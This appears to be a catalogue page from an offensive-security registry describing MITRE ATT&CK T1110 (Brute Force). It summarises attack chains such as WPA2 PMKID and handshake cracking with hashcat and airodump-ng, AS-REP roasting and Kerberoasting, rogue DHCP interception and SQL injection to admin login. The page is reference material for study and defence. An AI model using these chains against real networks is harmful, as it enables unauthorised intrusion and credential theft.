Brute Force
Guess credentials via repeated authentication attempts.
§ Where this technique fits
T1110 is catalogued under the Credential Access tactic of the offensive-security kill-chain. It appears in 7 approved dossiers in the registry, typically at step 4.6 on average.
Authoritative reference: attack.mitre.org/techniques/T1110/.
§ Dossiers chaining this technique
- step 3 / 5
PMKID attack → offline crack with no client interaction
WPA2 PMKID can be extracted from a single association attempt with the AP — no client needed. hcxdumptool + hashcat -m 22000 yields the PSK if it's weak.
- step 3 / 8
AS-REP roast → cracked user → Kerberoast → service-account admin
Anonymous attacker recovers a user password via AS-REP roasting, authenticates, kerberoasts a service account with weak password, and lands on a high-value server.
- step 4 / 6
WPA2-PSK handshake capture + crack → LAN access
Deauth a connected client to force re-association, capture the 4-way handshake with airodump-ng, crack the PSK offline with hashcat.
- step 4 / 6
RODC compromise → cracked NT hashes of revealed accounts
A Read-Only Domain Controller stores password material only for principals on its msDS-RevealedList. Compromising the RODC + cracking those hashes gives you the corresponding users.
- step 5 / 5
Rogue DHCP → DNS poisoning → MITM
Bring up a faster DHCP server on the segment; new clients get attacker as gateway + DNS — strip HTTPS, capture creds, inject payloads.
- step 6 / 8
SQLi (UNION) → DB dump → admin login
Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin.
- step 7 / 7
Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022)
Attacker compromised a single LastPass DevOps engineer's home machine via outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, exfiltrated production vault data.
§ What commonly comes next
- 01Valid Accountsseen 6×T1078 · Initial Access